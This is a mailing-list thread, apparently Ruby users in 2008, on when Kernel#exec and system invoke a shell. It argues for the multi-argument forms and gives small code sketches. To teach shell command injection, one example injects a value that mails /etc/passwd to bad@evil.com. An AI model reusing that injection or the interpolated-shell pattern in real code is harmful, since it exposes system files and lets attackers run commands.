Ruby's Kernel::exec (and system and %x)

> The problem is that `` and system() make calls to the shell. He is
> trying to NOT have a call to a shell.

Which I don't really see the reason for. I know I spouted off in
another thread about "standing on the shoulders of others", but I do
think it's alright to trust certain types of software. Point being...

Calls to a shell -- of your choice -- shouldn't be considered a bad thing.

Calls to a shell are a VERY bad thing if used incorrectly.

Read up on the security problems related to SQL injection. Shell
command injection is the same kind of problem, and it is the reason
why someone who understands how a shell works would want to avoid one.

Here is one example to get you going. Pretend that you have a program
called "tolower" and that program takes in a single argument as a
string. Pretend that this program simply prints the string to stdout,
with all upper case characters converted to lower case.

Now, pretend that you have to implement a routine that takes in a
string (from any input source - pretend it comes from a malicious
user) and passes it to "tolower".

The right answer (because it does not use the shell):

  exec("tolower", str)

The wrong answer (because it uses the shell and doesn't escape
anything):

  exec("tolower #{str}")

Not only is the first option faster (no shell is invoked), but it is
also safer. Imagine this:

  str = "FOO; mail bad@evil.com < /etc/passwd"

What happens? In the first case, that exact string is passed to
"tolower" as a single argument, and "tolower" will simply print:

  foo; mail bad@evil.com < /etc/passwd

but NOTHING malicious will be executed.

In the second example above, the shell is invoked to parse the
command, and your information is mailed out without your knowledge.
All "tolower" will see is "FOO".

The moral of the story is to avoid sub-shells whenever possible. If
you don't need one, don't use one. Code defensively and explicitly to
avoid one. Your code will be faster, more correct, and immune to
certain attacks.
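
To make the difference concrete, here is a minimal sketch. It assumes a
Unix-like system. Since "tolower" is only a pretend program, a child
Ruby process that downcases its first argument stands in for it; the
TOLOWER constant and both method names are made up for this
illustration. The hostile string uses a harmless echo in place of the
mail command.

```ruby
require "open3"
require "rbconfig"
require "shellwords"

# Hypothetical stand-in for "tolower": a child Ruby process that prints
# its first argument in lower case.
TOLOWER = [RbConfig.ruby, "-e", "puts ARGV[0].downcase"].freeze

# Multi-argument form: no shell is involved, so str reaches the child
# as one argument, whatever characters it contains.
def tolower_direct(str)
  out, _status = Open3.capture2(*TOLOWER, str)
  out
end

# Single-string form: the whole line goes to the shell, which treats
# ";" in str as a command separator.
def tolower_via_shell(str)
  out, _status = Open3.capture2("#{Shellwords.join(TOLOWER)} #{str}")
  out
end

hostile = "FOO; echo INJECTED"
puts tolower_direct(hostile)     # prints: foo; echo injected
puts tolower_via_shell(hostile)  # prints: foo, then INJECTED on its own line
```

In the second call the stand-in program only ever sees "FOO"; the rest
of the string was run by the shell as a separate command.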

-JJ

I believe:

system(cmd, "http://www.google.com")

would also skip the shell entirely, since you are providing more than
one argument to system.

Correct. It is only the one-argument form that uses the shell.
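
A quick way to check this yourself, assuming a Unix-like system with
echo on the PATH. The capture_system helper and the GREETING variable
are made up for this sketch; the helper just runs Kernel#system with its
output redirected into a pipe so the result can be inspected.

```ruby
ENV["GREETING"] = "hello"

# Hypothetical helper: run Kernel#system and return [result, stdout text].
def capture_system(*args)
  reader, writer = IO.pipe
  ok = system(*args, out: writer)
  writer.close
  output = reader.read
  reader.close
  [ok, output]
end

# Two arguments: echo receives the literal text, nothing expands it.
_ok, direct = capture_system("echo", "$GREETING")
puts direct      # prints: $GREETING

# One string containing "$": the shell expands the variable first.
_ok, via_shell = capture_system("echo $GREETING")
puts via_shell   # prints: hello
```

As far as I know, Ruby may also skip the shell for a one-string command
that contains no shell metacharacters, but that is not something to
rely on for safety.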

Seems like a dodgy sort of design to me. I gather it comes from
trying to merge system() and exec() from the C library, probably for
systems that don't have a concept of fork(). From JJ's post, I gather
that Perl might be the source of this chimera.

I wish popular languages would think about these decisions. Two APIs
for this would be much better.

The first could be Kernel::exec, and would simply run the process
given. No shell interpretation would ever be done on the argument(s).
Give it one string, and that's the program it runs. Give it multiple
strings to pass multiple arguments.

In fact, I'm willing to bet that 99% of the time, one already has the
command and arguments separated into a list, and one rarely if ever
wants to use the one-argument-use-the-shell form of exec (or system).

A second routine, "Kernel::exec_cmd" let's call it, could take in
exactly one string, and would pass it through the platform's command
interpreter. This would be documented with all the ugly warnings that
are required so people don't write

  exec_cmd( "ls #{user_input}" )

The confusion that could be cleared up by separating these out is a
big win I think. Another benefit is that the Unix implementation of
exec_cmd could simply be

  exec( "/bin/sh", "-c", arg)
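
Here is a rough sketch of what that split could look like on top of
today's Kernel#exec, assuming a Unix-like system. The SplitExec module,
exec_direct, exec_cmd and the exit_status_of helper are all hypothetical
names; none of them exist in Ruby.

```ruby
# Hypothetical split of exec into two entry points.
module SplitExec
  module_function

  # Never uses a shell. The [program, argv0] pair forces direct
  # execution even when no arguments are given.
  def exec_direct(program, *args)
    Kernel.exec([program, program], *args)
  end

  # Always uses the shell, and says so in its name.
  def exec_cmd(command_line)
    Kernel.exec(["/bin/sh", "sh"], "-c", command_line)
  end
end

# Helper for trying it out: run the block in a forked child, because
# exec replaces the calling process, and report the child's exit status.
def exit_status_of
  pid = fork { yield }
  Process.wait(pid)
  $?.exitstatus
end

puts exit_status_of { SplitExec.exec_cmd("exit 7") }                 # prints: 7
puts exit_status_of { SplitExec.exec_direct("sh", "-c", "exit 5") }  # prints: 5
```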

-JJ

system() always goes to a shell.

On Jan 8, 2008, at 11:22 AM, Gary Wright wrote:

I just wanted to point out that if you are passing arguments to the program you can use:

  system(cmd, arg1, arg2)

How would one pass args here, though?
exec( ["/usr/bin/ls", "ls"], "-al")

Is that right?

Yes, that is right. You can also use the simple form

  exec( "/usr/bin/ls", "-al" )

(or wherever your ls lives). Two or more arguments to "exec" force
non-shell mode.
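
For what the two-element array does, here is a small sketch, assuming a
Unix-like system with /bin/sh. The method name and "custom-name" are
made up. The first element is the file to execute and the second is the
name the child sees as its own argv[0]; Open3.capture2 accepts the same
argument forms as exec and system, and is used here only so the output
can be captured.

```ruby
require "open3"

# Hypothetical helper: start /bin/sh under a chosen argv[0] and ask it
# to print $0, which is the name it was started as.
def argv0_seen_by_child(name)
  out, _status = Open3.capture2(["/bin/sh", name], "-c", "echo $0")
  out.chomp
end

# The child should report the second array element, not "/bin/sh".
puts argv0_seen_by_child("custom-name")
```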

-JJ

> The first could be Kernel::exec, and would simply run the process
> given. No shell interpretation would ever be done on the argument(s).
> Give it one string, and that's the program it runs. Give it multiple
> strings to pass multiple arguments.

Yes, but in the Unix/C world exec() replaces the existing program, so exec() without fork() is a not-so-useful combination. For whatever reason, Kernel#exec on Windows ended up as a Windows version of fork/exec, which makes exec non-portable.

> A second routine, "Kernel::exec_cmd" let's call it, could take in
> exactly one string, and would pass it through the platform's command
> interpreter. This would be documented with all the ugly warnings that
> are required so people don't write

You are describing "Kernel::system" without the funny two-element array caveat.

I think a better partitioning of the problem would be:

   fork/exec: craft what you need, only available on *nix systems
   system: execute a command line via the command-interpreter
   run: execute a program *without* using the command-interpreter

I just made up the name 'run'. I don't think there are standards that specify such an interface, which is why exec/system have been munged, I guess.
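
A sketch of what such a 'run' might look like, built on Process.spawn
and Process.wait2 so it does not depend on calling fork directly. The
method is hypothetical (it is the made-up name from above), and the
examples assume a Unix-like system with sh on the PATH.

```ruby
# Hypothetical 'run': start a program without the command interpreter,
# wait for it, and return its Process::Status.
def run(program, *args)
  # The [program, argv0] pair keeps even a no-argument call away from
  # the shell.
  pid = Process.spawn([program, program], *args)
  _pid, status = Process.wait2(pid)
  status
end

puts run("sh", "-c", "exit 4").exitstatus   # prints: 4

begin
  # Not a command line: this looks for a program literally named "echo hi".
  run("echo hi")
rescue Errno::ENOENT => e
  puts "not found: #{e.message}"
end
```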

Gary Wright

On Jan 8, 2008, at 3:19 PM, JJ wrote:

So do you have a solution for executing a file with no args? Or is:
exec([cmd, cmd]) the preferred one?

BTW, I meant
  exec([cmd, ""]) instead of exec(cmd, "")
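
A small check of the no-argument case, assuming a Unix-like system with
echo and true on the PATH. It uses system rather than exec so the script
keeps running; the argument rules are the same. With [cmd, ""] the shell
is avoided too, but the child then sees an empty string as its own name,
so [cmd, cmd] is probably the less surprising choice.

```ruby
# Plain string: treated as a command line, so echo runs with the
# argument "hi".
puts system("echo hi").inspect                # prints hi, then true

# [cmd, argv0] form: the text is a program name, spaces and all. No
# program is literally called "echo hi", so nothing runs.
puts system(["echo hi", "echo hi"]).inspect   # prints: nil

# A real program with no arguments, run without a shell.
puts system(["true", "true"]).inspect         # prints: true
```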

On Jan 8, 2008, at 9:49 AM, JJ wrote:

> The right answer (because it does not use the shell):
>
>   exec("tolower", str)

Then I retract my previous statement! Thank you!

On Jan 8, 2008, at 3:19 PM, JJ wrote:

>>> I believe:
>>>
>>> system(cmd, "http://www.google.com")
>>>
>>> would also skip the shell entirely, since you are providing more than
>>> one argument to system.
>>
>> Correct. It is only the one-argument form that uses the shell.
>
> system() always goes to a shell.

No, not true. system() always lets the Ruby process continue on after
the sub-program is finished, but a system() with two or more arguments
doesn't run any shell. It runs the sub-program directly as a child.
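
Here is a minimal sketch of that difference, assuming a platform where
fork is available. Both method names are made up; the child program is
just another Ruby process that exits with status 3.

```ruby
require "rbconfig"

# system: the child runs, then control comes back to this Ruby process.
def status_after_system
  system(RbConfig.ruby, "-e", "exit 3")
  $?.exitstatus
end

# exec: the calling process is replaced, so it is done inside a forked
# child here. The line after exec never runs when exec succeeds.
def status_after_exec
  pid = fork do
    exec(RbConfig.ruby, "-e", "exit 3")
    exit!(99) # not reached
  end
  Process.wait(pid)
  $?.exitstatus
end

puts status_after_system   # prints: 3
puts status_after_exec     # prints: 3 (not 99)
```

Both calls pass more than one argument, so neither one involves a shell.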

The same rules apply to exec() and system() that have been discussed
in this thread.

-JJ

>> The first could be Kernel::exec, and would simply run
>> the process given. No shell interpretation would ever
>> be done on the argument(s).
>>
>> Give it one string, and that's the program it runs.
>>
>> Give it multiple strings to pass multiple arguments.
>
> Yes, but in the Unix/C world exec() replaces the
> existing program and so exec() without fork() is a
> not-so-useful combination.

Well, I argue that exec() without fork() is useful in any world, but
it may not be available in some. It can be poorly emulated by
CreateProcess() and exit().

My point was not this though; it was simply that instead of having one
routine behave in two very different ways (exec via shell and exec
directly), there should have been two routines. Getting those confused
is the source of many, many bugs.

I would bet that any piece of code you gave me in Perl or Ruby (or any
other language that supports this idiom) that used system() or exec()
would have a very high chance of containing bugs related to this very
problem. I've seen it all the time.

> I think a better partitioning of the problem would be:
>
>    fork/exec: craft what you need, only available on
>                *nix systems
>    system: execute a command line via the
>                command-interpreter
>    run: execute a program *without* using the
>                command-interpreter

Well, my exec and exec_cmd suggestions were meant to have analogs of
system and system_cmd that did the implicit fork on unix. My exec is
like your first exec, except there are two - one via the shell and one
via the system call.

My system_cmd (via the shell) is like your system, and my system
(no shell) is like your run. We're speaking the same language; just
using different words.

-JJ